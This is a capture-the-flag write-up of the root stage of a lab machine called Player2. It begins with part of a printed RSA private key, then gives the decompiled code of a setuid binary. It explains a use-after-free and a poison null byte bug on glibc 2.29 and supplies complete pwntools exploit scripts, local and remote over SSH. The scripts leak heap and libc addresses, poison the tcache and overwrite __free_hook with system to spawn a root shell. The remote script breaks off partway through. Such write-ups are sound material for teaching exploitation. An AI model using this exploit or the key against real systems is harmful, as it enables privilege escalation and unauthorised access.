+kXUsGy+Cp9rp3gS3qZ2UGUMsqcxCcKhn92azjFoZFMCP8g4bBXUgGp4CmFOtdvz
SM29st5P4Wqn0bHxupZ0ht8g30TJd7FNYRcQ7/wGzjvJzVBywCxirkhPnv8sQmdE
+UAakPZsfw16u5dDbz9JElNbBTvwO9chpYIs0QIDAQABAoIBAA5uqzSB1C/3xBWd
62NnWfZJ5i9mzd/fMnAZIWXNcA1XIMte0c3H57dnk6LtbSLcn0jTcpbqRaWtmvUN
wANiwcgNg9U1vS+MFB7xeqbtUszvoizA2/ScZW3P/DURimbWq3BkTdgVOjhElh6D
62LlRtW78EaVXYa5bGfFXM7cXYsBibg1+HOLon3Lrq42j1qTJHH/oDbZzAHTo6IO
91TvZVnms2fGYTdATIestpIRkfKr7lPkIAPsU7AeI5iAi1442Xv1NvGG5WPhNTFC
gw4R0V+96fOtYrqDaLiBeJTMRYp/eqYHXg4wyF9ZEfRhFFOrbLUHtUIvkFI0Ya/Y
QACn17UCgYEA/eI6xY4GwKxV1CvghL+aYBmqpD84FPXLzyEoofxctQwcLyqc5k5f
llga+8yZZyeWB/rWmOLSmT/41Z0j6an0bLPe0l9okX4j8WOSmO6TisD4WiFjdAos
JqiQej4Jch4fTJGegctyaOwsIVvP+hKRvYIwO9CKsaAgOQySlxQBOwMCgYEA7l+3
JloRxnCYYv+eO94sNJWAxAYrcPKP6nhFc2ReZEyrPxTezbbUlpAHf+gVJNVdetMt
ioLhQPUNCb3mpaoP0mUtTmpmkcLbi3W25xXfgTiX8e6ZWUmw+6t2uknttjti97dP
QFwjZX6QPZu4ToNJczathY2+hREdxR5hR6WrJpsCgYEApmNIz0ZoiIepbHchGv8T
pp3Lpv9DuwDoBKSfo6HoBEOeiQ7ta0a8AKVXceTCOMfJ3Qr475PgH828QAtPiQj4
hvFPPCKJPqkj10TBw/a/vXUAjtlI+7ja/K8GmQblW+P/8UeSUVBLeBYoSeiJIkRf
PYsAH4NqEkV2OM1TmS3kLI8CgYBne7AD+0gKMOlG2Re1f88LCPg8oT0MrJDjxlDI
NoNv4YTaPtI21i9WKbLHyVYchnAtmS4FGqp1S6zcVM+jjb+OpBPWHgTnNIOg+Hpt
uaYs8AeupNl31LD7oMVLPDrxSLi/N5o1I4rOTfKKfGa31vD1DoCoIQ/brsGQyI6M
zxQNDwKBgQCBOLY8aLyv/Hi0l1Ve8Fur5bLQ4BwimY3TsJTFFwU4IDFQY78AczkK
/1i6dn3iKSmL75aVKgQ5pJHkPYiTWTRq2a/y8g/leCrvPDM19KB5Zr0Z1tCw5XCz
iZHQGq04r9PMTAFTmaQfMzDy1Hfo8kZ/2y5+2+lC7wIlFMyYze8n8g==
-----END RSA PRIVATE KEY-----


Testing it on the two possible users, it turned out that it works for observer.  And now user has been pwned!  

Finally, we have hit the part for root. It's a poison null byte on 2.29 (there was also an easier unintended heap overflow). Anyways, make sure to read up on malloc.c for 2.29 on bminor's mirror of the glibc source before continuing! The binary can be found in /opt/Configuration_Utility, and running checksec on it immediately shows that it is patchelf'd to use an ld and libc different from the box's. Personally, I like to use all of pwndbg's capabilities with libc debug symbols, so I ran the following commands to switch the interpreter and rpath back to the defaults and debugged on a headless Ubuntu VM running the same libc version:

patchelf --set-interpreter /lib64/ld-linux-x86-64.so.2 Protobs
patchelf --remove-rpath Protobs

Anyways, let us begin the pwning!  Here is the binary reversed with my comments.


//only 15 indices

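typedef struct
{
  char game[20];            // 0x00
  unsigned int contrast;    // 0x14
  unsigned int gamma;       // 0x18
  unsigned int xres;        // 0x1c
  unsigned int yres;        // 0x20
  unsigned int controller;  // 0x24
  unsigned int desc;        // 0x28: description size
  char *description;        // 0x30 (after 4 bytes of padding); sizeof == 0x38
}gamestruct;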

void create(void)
{
  char *__dest;
  long lVar1;
  int iVar2;
  undefined4 uVar3;
  void *pvVar4;
  ssize_t sVar5;
  size_t sVar6;
  long in_FS_OFFSET;
  int local_448;
  char local_428 [19];
  undefined local_415;
  long local_20;
  
  local_20 = *(long *)(in_FS_OFFSET + 0x28);
  iVar2 = FUN_00400c8b();
  if (iVar2 < 0) {
    FUN_00400c3e();
  }
  pvVar4 = malloc(0x38); // 0x38 request -> 0x40 chunk, i.e. the 0x40 tcache bin (libc 2.29)
  *(void **)(&DAT_00603060 + (long)iVar2 * 8) = pvVar4;
  __dest = *(char **)(&DAT_00603060 + (long)iVar2 * 8);
  putchar(10);
  puts("==New Game Configuration");
  printf(" [ Game                ]: ");
  fgets(local_428,0x400,stdin);
  readin(local_428);
  local_415 = 0;
  strncpy(__dest,local_428,0x14);
  uVar3 = readnum(" [ Contrast            ]: ");
  *(undefined4 *)(__dest + 0x14) = uVar3;
  uVar3 = readnum(" [ Gamma               ]: ");
  *(undefined4 *)(__dest + 0x18) = uVar3;
  uVar3 = readnum(" [ Resolution X-Axis   ]: ");
  *(undefined4 *)(__dest + 0x1c) = uVar3;
  uVar3 = readnum(" [ Resolution Y-Axis   ]: ");
  *(undefined4 *)(__dest + 0x20) = uVar3;
  uVar3 = readnum(" [ Controller          ]: ");
  *(undefined4 *)(__dest + 0x24) = uVar3;
  uVar3 = readnum(" [ Size of Description ]: "); // bug: with size 0, the stale description pointer at +0x30 is never cleared (UAF)
  *(undefined4 *)(__dest + 0x28) = uVar3;
  if (*(int *)(__dest + 0x28) != 0) {
    printf(" [ Description         ]: ");
    sVar5 = read(0,local_428,0x200);
    readin(local_428);
    if (*(uint *)(__dest + 0x28) <= (uint)sVar5) {
      local_428[(ulong)*(uint *)(__dest + 0x28)] = 0;
    }
    pvVar4 = malloc((ulong)*(uint *)(__dest + 0x28));
    *(void **)(__dest + 0x30) = pvVar4; //another allocation
    lVar1 = *(long *)(__dest + 0x30);
    local_448 = 0;
    while( true ) {
      sVar6 = strlen(local_428); // counts all the way to the null byte
      // poison null byte: the loop copies strlen + 1 bytes (including the terminator) rather than the description size
      if (sVar6 < (ulong)(long)local_448) break;
      *(char *)((long)local_448 + lVar1) = local_428[(long)local_448];
      local_448 = local_448 + 1;
    }
  }
  putchar(10);
  if (local_20 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}



void delete(void)
{
  long lVar1;
  void *__ptr;
  uint uVar2;
  long in_FS_OFFSET;
  
  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
  putchar(10);
  puts("==Delete Game Configuration");
  puts(" >>> Run the list option to see available configurations.");
  uVar2 = readnum(" [ Config Index    ]: ");
  if ((uVar2 < 0xf) && (*(long *)(&DAT_00603060 + (ulong)uVar2 * 8) != 0)) {
    __ptr = *(void **)(&DAT_00603060 + (ulong)uVar2 * 8);
    if (*(long *)((long)__ptr + 0x30) != 0) {
      free(*(void **)((long)__ptr + 0x30)); 
    }
    free(__ptr);
    *(undefined8 *)(&DAT_00603060 + (ulong)uVar2 * 8) = 0; 
  }
  else {
    puts("  [!] Invalid index.");
  }
  putchar(10);
  if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}


void readin(char *pcParm1)
{
  long lVar1;
  char *pcVar2;
  long in_FS_OFFSET;
  
  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
  pcVar2 = strchr(pcParm1,0xd);
  if (pcVar2 != (char *)0x0) {
    *pcVar2 = 0;
  }
  pcVar2 = strchr(pcParm1,10);
  if (pcVar2 != (char *)0x0) {
    *pcVar2 = 0;
  }
  if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}


ulong readnum(char *pcParm1)
{
  ulong uVar1;
  long in_FS_OFFSET;
  char local_28 [24];
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  printf(pcParm1);
  fgets(local_28,0x10,stdin);
  uVar1 = strtol(local_28,(char **)0x0,10);
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return uVar1 & 0xffffffff;
}



void show(void)
{
  long lVar1;
  long lVar2;
  uint uVar3;
  long in_FS_OFFSET;
  
  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
  putchar(10);
  puts("==Read Game Configuration");
  puts(" >>> Run the list option to see available configurations.");
  uVar3 = readnum(" [ Config Index    ]: ");
  if ((uVar3 < 0xf) && (*(long *)(&DAT_00603060 + (ulong)uVar3 * 8) != 0)) {
    lVar2 = *(long *)(&DAT_00603060 + (ulong)uVar3 * 8);
    printf("  [ Game                ]: %s\n",lVar2);
    printf("  [ Contrast            ]: %u\n",(ulong)*(uint *)(lVar2 + 0x14));
    printf("  [ Gamma               ]: %u\n",(ulong)*(uint *)(lVar2 + 0x18));
    printf("  [ Resolution X-Axis   ]: %u\n",(ulong)*(uint *)(lVar2 + 0x1c));
    printf("  [ Resolution Y-Axis   ]: %u\n",(ulong)*(uint *)(lVar2 + 0x20));
    printf("  [ Controller          ]: %u\n",(ulong)*(uint *)(lVar2 + 0x24));
    if (*(long *)(lVar2 + 0x30) != 0) {
      printf("  [ Description         ]: %s\n",*(undefined8 *)(lVar2 + 0x30));
    }
  }
  else {
    puts("  [!] Invalid index.");
  }
  putchar(10);
  if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}



void list(void)
{
  long lVar1;
  long in_FS_OFFSET;
  uint local_1c;
  
  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
  putchar(10);
  puts("==List of Configurations");
  local_1c = 0;
  while (local_1c < 0xf) {
    if (*(long *)(&DAT_00603060 + (ulong)local_1c * 8) != 0) {
      printf(" [%02u] : %s\n",(ulong)local_1c,*(undefined8 *)(&DAT_00603060 + (ulong)local_1c *8));
    }
    local_1c = local_1c + 1;
  }
  putchar(10);
  if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

void main(void)
{
  long in_FS_OFFSET;
  char local_28 [24];
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  printf("protobs@player2:~$ ");
  fgets(local_28,0x10,stdin);
  switch(local_28[0]) {
  case '0':
    help();
    break;
  case '1':
    list();
    break;
  case '2':
    create();
    break;
  case '3':
    show();
    break;
  case '4':
    delete();
    break;
  case '5':
    FUN_00400be7();
    break;
  default:
    putchar(10);
    puts("[!] Invalid option. Enter \'0\' for available options.");
    putchar(10);
  }
  if (local_10 == *(long *)(in_FS_OFFSET + 0x28)) {
    return;
  }
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail();
}

Basically, there are two bugs: a UAF and a poison null byte. The UAF comes from the fact that the game struct (a 0x40 tcache chunk, since it is a 0x38 allocation) does not have its description pointer zeroed out when freed. Therefore, we can make a game with a description, free it, get the same game chunk back with another allocation, and get the same description back just by setting the size to 0, as the pointer will remain the same. In the create function, there is also a poison null byte due to how the description is copied: the loop copies strlen(buffer) + 1 bytes, so a description exactly as long as the requested size writes its terminating null one byte past the chunk. Using the UAF, we can grab both a heap and a libc leak. The heap leak can be grabbed from tcache bin pointers. The libc leak can be grabbed from unsorted bin pointers, which is easy since there is no limit on how big our allocations can be, so we can just allocate chunks too large for tcache so that they fall into the unsorted bin.
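A small sketch for turning those leaks into addresses: show prints the description with %s, so the output stops at the first NUL and has to be padded back to 8 bytes. `UNSORTED_FD_OFFSET` is a hypothetical placeholder; measure the real distance from libc base to the unsorted bin pointer in gdb against the exact libc in use.

```python
# Hypothetical: distance from libc base to the unsorted-bin fd value.
UNSORTED_FD_OFFSET = 0x1E4CA0


def leak_to_int(printed: bytes) -> int:
    """Turn bytes printed by %s (cut at the first NUL) into an address."""
    if not 0 < len(printed) <= 8:
        raise ValueError("unexpected leak length")
    return int.from_bytes(printed.ljust(8, b"\x00"), "little")


def libc_base_from_unsorted(printed: bytes) -> int:
    base = leak_to_int(printed) - UNSORTED_FD_OFFSET
    if base & 0xFFF:
        raise ValueError(f"libc base {base:#x} is not page aligned")
    return base
```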

As for the poison null byte, the concept is the same as in older poison null byte attacks. The only difference is that libc 2.29 adds the following check to backward consolidation in free:

    if (!prev_inuse(p)) {
      prevsize = prev_size (p);
      size += prevsize;
      p = chunk_at_offset(p, -((long) prevsize));
      if (__glibc_unlikely (chunksize(p) != prevsize))
        malloc_printerr ("corrupted size vs. prev_size while consolidating");
      unlink_chunk (av, p);
    }

Bypassing this isn't too hard. Just forge a fake chunk right above the region you want to coalesce with and give it the correct size (remember the prev_size detail in poison null byte attacks: the prev_size value determines where the check looks and how far back it coalesces!). However, you will also need heap pointers that point back to the forged chunk in order to pass the classic unlink check that FD->bk == P and BK->fd == P.
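If you know the forged chunk's own address, one common way to pass both pointer checks is to point fd and bk at the chunk itself, so that FD->bk and BK->fd both read back P. The exploit below writes the same heap address (heapleak+0xa50) into both fields; I'm assuming here that this address is the forged chunk. The toy model uses a dict as 8-byte memory, and all addresses are hypothetical.

```python
def chunksize(mem, p):
    return mem.get(p + 0x8, 0) & ~0x7         # size field without the flag bits

def unlink_checks_pass(mem, p):
    """Mimic the integrity checks unlink performs before touching FD/BK."""
    size = chunksize(mem, p)
    if size != mem.get(p + size, 0):          # prev_size stored in the next chunk
        return False                          # "corrupted size vs. prev_size"
    fd, bk = mem.get(p + 0x10, 0), mem.get(p + 0x18, 0)
    # FD->bk lives at fd + 0x18 and BK->fd at bk + 0x10.
    return mem.get(fd + 0x18, 0) == p and mem.get(bk + 0x10, 0) == p


P = 0x555555559a50      # hypothetical address of the forged chunk
SIZE = 0x1d0            # forged size (small + 0x38 in the exploit)
mem = {
    P + 0x8: SIZE,      # size
    P + 0x10: P,        # fd -> the chunk itself
    P + 0x18: P,        # bk -> the chunk itself
    P + SIZE: SIZE,     # fake prev_size in the next chunk's header
}
print(unlink_checks_pass(mem, P))   # True
```

Because the same value also sits in the next chunk's prev_size, the 2.29 "corrupted size vs. prev_size while consolidating" check sees matching sizes as well.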

Below is the unlink macro from older glibc (in 2.29 it became the unlink_chunk function called above, with the same checks):

#define unlink(AV, P, BK, FD) {                                            \
   if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))      \
     malloc_printerr ("corrupted size vs. prev_size");                  \
   FD = P->fd;                                      \
   BK = P->bk;                                      \
   if (__builtin_expect (FD->bk != P || BK->fd != P, 0))              \
     malloc_printerr ("corrupted double-linked list");                  \
   else {                                      \
       FD->bk = BK;                                  \
       BK->fd = FD;                                  \
       /* ... large-bin fd_nextsize/bk_nextsize handling omitted ... */ \
     }                                              \
}

Somehow I missed the really obvious massive heap overflow caused by the buffer issue above, as sampriti, R4J, and hevr pointed out. Notice that the name and the description are read into the same stack buffer, but the fgets for the name accepts far more data (0x400 bytes) than the read for the description, which is capped at 0x200. If we first send a long name and then fill the description all the way to its cap, the strlen-based copy to the heap runs past the description into the leftover name bytes and copies everything over, giving a massive heap overflow. From there, the usual tcache tricks would most likely give an arbitrary write. This method of exploitation would have been much simpler.
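A toy model of that overflow, under stated assumptions: the name and description share one 0x400-byte stack buffer, the description read is capped at 0x200 bytes and adds no terminator of its own, and the heap copy length comes from strlen. The function names are hypothetical.

```python
BUF_SIZE = 0x400      # fgets(name, 0x400, stdin), per the text
DESC_CAP = 0x200      # the description read is capped here

def strlen(buf):
    n = buf.find(b'\x00')
    return len(buf) if n == -1 else n

def bytes_copied_to_heap(name, desc):
    buf = bytearray(BUF_SIZE)
    name = name[:BUF_SIZE - 1]          # fgets keeps room for its NUL
    buf[:len(name)] = name
    buf[len(name)] = 0
    desc = desc[:DESC_CAP]
    buf[:len(desc)] = desc              # assumed: no terminator written here
    return strlen(buf)                  # length used for the copy to the heap

copied = bytes_copied_to_heap(b'N' * 0x3ff, b'D' * DESC_CAP)
print(hex(copied), hex(copied - DESC_CAP))   # 0x3ff 0x1ff
```

With a 0x200-byte description chunk, that is 0x1ff bytes written past its end. A short name leaves a NUL right after the description, so nothing overflows.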

Anyways, afterwards, you should be able to coalesce, get heap overlap, and pop a shell.  Now let's write the exploit.  Make sure to debug along if you were not able to solve this!

First thing I do is write all the helper functions.  

from pwn import *

#context.log_level = 'debug'
#no pie
bin = ELF('./Protobs')
libc = ELF('./libc.so.6')

p = process('./Protobs')

#it's suid so life becomes even easier!
#bss at 0x603060
def wait():
    p.recvrepeat(0.1)

def alloc(size, desc, game='', contrast=0,gamma=0,xres=0,yres=0,controller=0):
    p.sendline('2')
    wait()
    p.sendline(game)
    wait()
    p.sendline(str(contrast))
    wait()
    p.sendline(str(gamma))
    wait()
    p.sendline(str(xres))
    wait()
    p.sendline(str(yres))
    wait()
    p.sendline(str(controller))
    wait()
    p.sendline(str(size))
    wait()
    if size != 0:
        p.sendline(desc)
        wait()


def free(index):
    p.sendline('4')
    wait()
    p.sendline(str(index))
    wait()

def show(index):
    p.sendline('3')
    wait()
    p.sendline(str(index))

Then I got a heap leak and a libc leak using the UAF bug above. It is important to keep track of how many chunks are left in the 0x40 tcache bin and to keep it filled, especially before the poison null byte, so that the game structs do not interfere with the poison null byte setup. Hopefully, my comments below will clear up any confusion.

small = 0x198
big = 0x4f0 #0x500-byte chunk
p.recvrepeat(2)
wait()
#fill with 6 tcache bins
for i in range(3):
    alloc(0x30, 'A' * 0x20)
for i in range(3): 
    free(i) #6 chunks in tcache
alloc(0, 'blah') 
show(0) #5 chunks in tcache
p.recvuntil('[ Description         ]: ')
heapleak = p.recvline()[:-1]
heapleak = u64(heapleak.ljust(8, '\x00'))
log.info('Heap leak: ' + hex(heapleak)) 
alloc(0x500, 'A' * 0x30) #4 chunks in tcache
alloc(0x200, 'A' * 0x30) #3 chunks in tcache, chunk index 2
free(2) #prevent top consolidation, back to 4 chunks in tcache
free(1) #for libc leaking, 5 chunks in tcache
alloc(0, 'blah') #4 chunks in tcache, chunk 1
show(1) #1 is taken up
p.recvuntil('[ Description         ]: ')
libcleak = p.recvline()[:-1]
libcleak = u64(libcleak.ljust(8, '\x00'))
libc.address = libcleak -  0x1e4c40 - 96
log.info("Libc Base: " + hex(libc.address)) 
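The leak handling above can be written as a small standalone sketch without pwntools. The 0x1e4c40 main_arena offset is taken from the exploit and only holds for the provided libc.so.6; the extra 96 is there because a lone unsorted-bin chunk's fd points at main_arena+96 on this 64-bit glibc. The leaked line in the example is made up.

```python
import struct

MAIN_ARENA_OFF = 0x1e4c40   # main_arena offset in the provided libc (from the exploit)
UNSORTED_FD_OFF = 96        # a lone unsorted chunk's fd points at main_arena + 96

def parse_leak(line):
    """Turn the NUL-truncated bytes printed by %s into an integer address."""
    if line.endswith(b'\n'):
        line = line[:-1]                   # same as recvline()[:-1] in the exploit
    return struct.unpack('<Q', line.ljust(8, b'\x00'))[0]

def libc_base_from_unsorted(leak):
    base = leak - MAIN_ARENA_OFF - UNSORTED_FD_OFF
    assert base & 0xfff == 0, 'libc base should be page aligned'
    return base

leak = parse_leak(b'\xa0\x4c\xfb\xf7\xff\x7f\n')   # hypothetical leaked line
print(hex(leak), hex(libc_base_from_unsorted(leak)))
# prints: 0x7ffff7fb4ca0 0x7ffff7dd0000
```

The page-alignment assertion is a cheap sanity check: a wrong offset or a mangled leak almost never produces a base ending in 0x000.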

As I mentioned earlier, I prefer to keep the 0x40 tcache bin used by the game metadata structs full so that it does not interfere with my poison null byte setup.

#fill rest of tcache
for i in range(4):
    alloc(0x200, 'A' * 0x20) #2, 3, 4, 5
#empty it
for i in range(3):
    alloc(0, '') #6, 7, 8
for i in range(7):
    free(i+2)
#7 chunks in 0x40 tcache
#tcache should be filled now
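The tcache comments in the leak and fill-up snippets can be double-checked with a small bookkeeping model that replays the same alloc/free calls. It only tracks counts, under these assumptions: each game struct is a malloc(0x38) (a 0x40 chunk), delete frees the description before the struct, a new entry takes the lowest free slot index, a size of 0 allocates no description, and each tcache bin holds at most 7 chunks of up to 0x410 bytes (glibc's defaults). The class and method names are hypothetical.

```python
import itertools

TCACHE_COUNT = 7           # default number of entries per tcache bin
TCACHE_MAX_CHUNK = 0x410   # largest chunk size tcache holds by default

def chunk_size(req):
    """malloc's request-to-chunk-size rounding on 64-bit."""
    return max(0x20, (req + 8 + 0xf) & ~0xf)

class CountModel:
    def __init__(self):
        self.counts = {}   # chunk size -> tcache count
        self.slots = {}    # slot index -> chunk sizes owned by that entry

    def _take(self, size):
        if self.counts.get(size, 0) > 0:
            self.counts[size] -= 1

    def _give(self, size):
        if size <= TCACHE_MAX_CHUNK and self.counts.get(size, 0) < TCACHE_COUNT:
            self.counts[size] = self.counts.get(size, 0) + 1

    def alloc(self, desc_size):
        idx = next(i for i in itertools.count() if i not in self.slots)
        owned = [chunk_size(0x38)] + ([chunk_size(desc_size)] if desc_size else [])
        for size in owned:
            self._take(size)
        self.slots[idx] = owned
        return idx

    def free(self, idx):
        for size in reversed(self.slots.pop(idx)):   # description first, then struct
            self._give(size)

    def n40(self):
        return self.counts.get(0x40, 0)


m = CountModel()
for _ in range(3):
    m.alloc(0x30)
for i in range(3):
    m.free(i)
after_frees = m.n40()
m.alloc(0)            # slot 0, heap leak
m.alloc(0x500)
m.alloc(0x200)
m.free(2)
m.free(1)
m.alloc(0)            # slot 1, libc leak
before_fill = m.n40()
for _ in range(4):
    m.alloc(0x200)    # slots 2-5
for _ in range(3):
    m.alloc(0)        # slots 6-8
for i in range(7):
    m.free(i + 2)
print(after_frees, before_fill, m.n40())   # 6 4 7
```

The 0x510 description never touches tcache because it is above the 0x410 limit, which is why it lands in the unsorted bin for the libc leak.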

Now it's time for the poison null byte. Just remember what I said before and you should be fine. One thing to note, however, is the size I chose to overwrite. I allocated 0x4f0 bytes so the chunk size becomes 0x500. Since 0x500 is larger than the biggest tcache chunk size (0x410), freeing it skips tcache entirely and goes straight to the coalesce/unsorted path, so I don't have to fill a tcache bin for it first. On top of that, the null byte turns its size field from 0x501 (PREV_INUSE set) into 0x500, so the libc checks on the chunks after it still pass, because the size itself did not actually change. You will also need to write the fake values slowly, backwards and one byte at a time, because of the way the allocation function transfers data from the buffer to the heap. Finally, make sure there is a freed chunk inside the coalesced region, so that you get heap overlap afterwards.
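Here is a toy model of that backward, one-NUL-at-a-time technique, replaying the forged-chunk writes from the exploit that follows on a plain bytearray. It assumes the allocation routine copies input up to its first NUL and then writes a single NUL terminator, that the 0x60 description chunk starts out zeroed, and it uses a hypothetical value for heapleak+0xa50.

```python
import struct

def p64(x):
    return struct.pack('<Q', x)

def u64(b):
    return struct.unpack('<Q', bytes(b))[0]

def copy_like_alloc(buf, data):
    """Assumed copy: bytes up to the first NUL in `data`, then one NUL terminator."""
    n = data.find(b'\x00')
    n = len(data) if n == -1 else n
    buf[:n] = data[:n]
    buf[n] = 0

P = 0x555555559a50        # hypothetical stand-in for heapleak + 0xa50
small = 0x198
desc = bytearray(0x58)    # usable bytes of the 0x60 chunk, assumed zeroed

copy_like_alloc(desc, b'C' * 0x38 + p64(P))         # bk: bytes 0x38..0x3d
for i in range(6):
    copy_like_alloc(desc, b'C' * (0x38 - i - 1))    # NULs at 0x37 down to 0x32
copy_like_alloc(desc, b'C' * 0x30 + p64(P))         # fd: bytes 0x30..0x35
for i in range(6):
    copy_like_alloc(desc, b'C' * (0x30 - i - 1))    # NULs at 0x2f down to 0x2a
copy_like_alloc(desc, b'C' * 0x28 + p64(small + 0x38))   # size 0x1d0

size, fd, bk = (u64(desc[o:o + 8]) for o in (0x28, 0x30, 0x38))
print(hex(size), fd == P, bk == P)   # 0x1d0 True True
```

Each write can only place one NUL (its terminator), so the high zero bytes of every 8-byte field are laid down first, from the highest offset downward, before the field's low bytes are written.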

#now time for poison null byte
alloc(0x50, 'C' * 0x38 + p64(heapleak+0xa50)) #2
#wipe out null bytes to set up forged chunk correctly
for i in range(6):
    free(2)
    alloc(0x50, 'C' * (0x38-i-1))
free(2) #continue setting up forged chunk
alloc(0x50, 'C' * 0x30 + p64(heapleak+0xa50))
for i in range(6):
    free(2)
    alloc(0x50, 'C' * (0x30-i-1))
free(2)
alloc(0x50, 'C' * 0x28 + p64(small+0x38)) #2
#forged chunk should be good to go

alloc(small, 'D' * 0x100) #3
alloc(big, 'E' * 0x100) #4
alloc(0x210, '') #prevent top consolidation #5
free(3)
alloc(small, 'F' * (small)) #poison null byte
#set up fake prev_size
free(3)
for i in range(6):
    alloc(small, 'F' * (small-i-1))
    free(3)
alloc(small, 'F'*(small-0x8)+p64(small+0x38))
free(3)
free(4) #chunk coalesced now
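The small-chunk writes above and the backward consolidation they set up can be checked with a toy model. Assumptions: the allocation routine copies input up to its first NUL and then writes one NUL terminator, the small chunk starts zeroed, and the 0x60 description chunk holding the forged chunk sits directly below the small chunk (which is what the small+0x38 value implies). All addresses are hypothetical.

```python
import struct

def p64(x):
    return struct.pack('<Q', x)

def u64(b):
    return struct.unpack('<Q', bytes(b))[0]

def copy_like_alloc(buf, data):
    """Assumed copy: bytes up to the first NUL in `data`, then one NUL terminator."""
    n = data.find(b'\x00')
    n = len(data) if n == -1 else n
    buf[:n] = data[:n]
    buf[n] = 0

small = 0x198
# Usable bytes of the small chunk followed by the big chunk's size field (0x501).
region = bytearray(b'\x00' * small + p64(0x501))

copy_like_alloc(region, b'F' * small)                 # NUL hits big's size LSB
for i in range(6):
    copy_like_alloc(region, b'F' * (small - i - 1))   # zero bytes 0x197..0x192
copy_like_alloc(region, b'F' * (small - 8) + p64(small + 0x38))

prev_size = u64(region[small - 8:small])   # big's prev_size
big_size = u64(region[small:small + 8])    # big's size, PREV_INUSE now clear

# Where free(big) will look for the previous chunk, under the assumed layout.
desc_user = 0x555555559a30                 # hypothetical 0x60 description user pointer
forged = desc_user + 0x20                  # forged chunk inside that description
small_hdr = desc_user - 0x10 + 0x60
big_hdr = small_hdr + ((small + 8 + 0xf) & ~0xf)
print(hex(prev_size), hex(big_size), big_hdr - prev_size == forged,
      hex(prev_size + big_size))
# prints: 0x1d0 0x500 True 0x6d0
```

So free(4) steps back exactly to the forged chunk, and the merged free chunk of 0x6d0 bytes covers the still-allocated-looking small chunk, which is the overlap used next.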

Now you have a coalesced region containing a free chunk, which gives you heap overlap. Tcache poisoning by overwriting the fd pointers is then trivial, but beware the tcache count check. You can handle it by allocating several chunks of the same size and freeing them all into the same tcache bin, so that when you poison the bin, the count is high enough that you don't have to worry about it dropping to -1 and the target region not being handed back. Then overwrite __free_hook with system and free a chunk holding a command string: since you control the pointer passed to free (its first argument, in rdi), this ends up calling system on that string.
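A toy model of why the extra same-size chunks matter. It models the count check described above by letting malloc serve a bin only while its count is positive. The chunk and __free_hook addresses are hypothetical, and the overlapping write is reduced to overwriting the head chunk's next pointer.

```python
class ToyTcacheBin:
    """One tcache bin as a singly linked list; mem maps a chunk to its next pointer."""

    def __init__(self):
        self.mem = {}
        self.head = 0
        self.count = 0

    def put(self, ptr):                  # free()
        self.mem[ptr] = self.head
        self.head = ptr
        self.count += 1

    def get(self):                       # malloc(): only while the count is positive
        if self.count <= 0 or self.head == 0:
            return None
        ptr = self.head
        self.head = self.mem.get(ptr, 0)
        self.count -= 1
        return ptr


FREE_HOOK = 0x7ffff7fb68e8   # hypothetical stand-in for libc.symbols['__free_hook']

def poison(n_freed):
    b = ToyTcacheBin()
    for i in range(n_freed):
        b.put(0x555555559000 + 0x70 * i)   # hypothetical 0x70-sized chunks
    b.mem[b.head] = FREE_HOOK              # overlap write: corrupt the head's next pointer
    return [b.get(), b.get()]

print(poison(3)[1] == FREE_HOOK, poison(1)[1])   # True None
```

With a single freed chunk, the first malloc drains the count and the poisoned pointer is never returned; with three, the second malloc hands back the target.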

alloc(0x20, 'temp') 
alloc(0x20, 'ZZZZ') 
alloc(0x60, 'Y' * 0x20) #6
alloc(0x60, 'Y'*0x20) #so tcache count doesn't drop, bypass that check
alloc(0x60, 'Y' * 0x20)
free(6)
free(7)
free(8)
alloc(small, 'A' * (0x60 + 0x70 + 0x10) + p64(libc.symbols['__free_hook'])) #overlapped chunks 
alloc(0x60, '')
#above was a tcache poison, now overwrite __free_hook
magic = [0xe237f, 0xe2383, 0xe2386]
alloc(0x60, p64(libc.symbols['system'])) #8, because it frees the desc first, we can't have it do that
alloc(0x300, '', game='/bin/bash\x00') #9
free(9)
p.interactive()

For the remote version, I used ssh from pwntools and slowed down the timing (recvrepeat(0.3) instead of 0.1).

from pwn import *

#context.log_level = 'debug'
#no pie
bin = ELF('./Protobs')
libc = ELF('./libc.so.6')


remoteShell = ssh(host = 'player2.htb', user='observer', keyfile='./key')
remoteShell.set_working_directory('/opt/Configuration_Utility')
p = remoteShell.process('./Protobs')

#it's suid so life becomes even easier!
#bss at 0x603060
def wait():
    p.recvrepeat(0.3)

def alloc(size, desc, game='', contrast=0,gamma=0,xres=0,yres=0,controller=0):
    p.sendline('2')
    wait()
    p.sendline(game)
    wait()
    p.sendline(str(contrast))
    wait()
    p.sendline(str(gamma))
    wait()
    p.sendline(str(xres))
    wait()
    p.sendline(str(yres))
    wait()
    p.sendline(str(controller))
    wait()
    p.sendline(str(size))
    wait()
    if size != 0:
        p.sendline(desc)
        wait()


def free(index):
    p.sendline('4')
    wait()
    p.sendline(str(index))
    wait()

def show(index):
    p.sendline('3')
    wait()
    p.sendline(str(index))

small = 0x198
big = 0x4f0 #0x500-byte chunk
p.recvrepeat(2)
wait()
#fill with 6 tcache bins
for i in range(3):
    alloc(0x30, 'A' * 0x20)
for i in range(3): 
    free(i) #6 chunks in tcache
alloc(0, 'blah') 
show(0) #5 chunks in tcache
p.recvuntil('[ Description         ]: ')
heapleak = p.recvline()[:-1]
heapleak = u64(heapleak.ljust(8, '\x00'))
log.info('Heap leak: ' + hex(heapleak)) 
alloc(0x500, 'A' * 0x30) #4 chunks in tcache
